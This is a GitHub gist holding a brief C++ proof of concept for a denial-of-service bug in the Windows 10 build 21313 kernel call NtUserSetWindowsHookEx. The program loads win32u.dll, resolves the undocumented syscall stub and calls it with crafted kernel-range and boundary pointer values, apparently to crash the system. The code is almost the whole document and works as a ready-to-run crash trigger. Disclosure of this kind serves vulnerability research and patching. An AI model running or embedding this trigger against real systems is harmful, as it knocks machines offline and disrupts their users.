Skip to content

Instantly share code, notes, and snippets.

@hfiref0x
Created February 19, 2021 09:31
Show Gist options
  • Save hfiref0x/8ecfbcc0a7afcc9917cef093ef3a18b2 to your computer and use it in GitHub Desktop.
Save hfiref0x/8ecfbcc0a7afcc9917cef093ef3a18b2 to your computer and use it in GitHub Desktop.
Denial of Service bug in Windows 10 (21313 build) NtUserSetWindowsHookEx
#include <Windows.h>
#include <cstdio>
typedef NTSTATUS(NTAPI* pfnNtUserSetWindowsHookEx)(
ULONG_PTR Param1,
ULONG_PTR Param2,
ULONG_PTR Param3,
ULONG_PTR Param4,
ULONG_PTR Param5,
ULONG_PTR Param6);
int main()
{
HMODULE hDll = LoadLibrary(TEXT("win32u.dll"));
pfnNtUserSetWindowsHookEx NtUserSetWindowsHookEx;
printf_s("[>]Start\r\n");
if (hDll) {
LoadLibrary(TEXT("user32.dll"));
NtUserSetWindowsHookEx = (pfnNtUserSetWindowsHookEx)GetProcAddress(hDll, "NtUserSetWindowsHookEx");
if (NtUserSetWindowsHookEx) {
NtUserSetWindowsHookEx(0xFFFF800000000000,
0xFFFF080000000000,
0x0000800000000000,
0x00007FFFFFFFFFFF,
0x8000000000000000,
0x000000000000FFFE);
}
else {
DWORD lastError = GetLastError();
printf_s(">NtUserSetWindowsHookEx not found, GetLastError %lu\r\n", lastError);
}
}
else {
printf_s(">No dll handle\r\n");
}
printf_s("[<]Stop");
ExitProcess(0);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment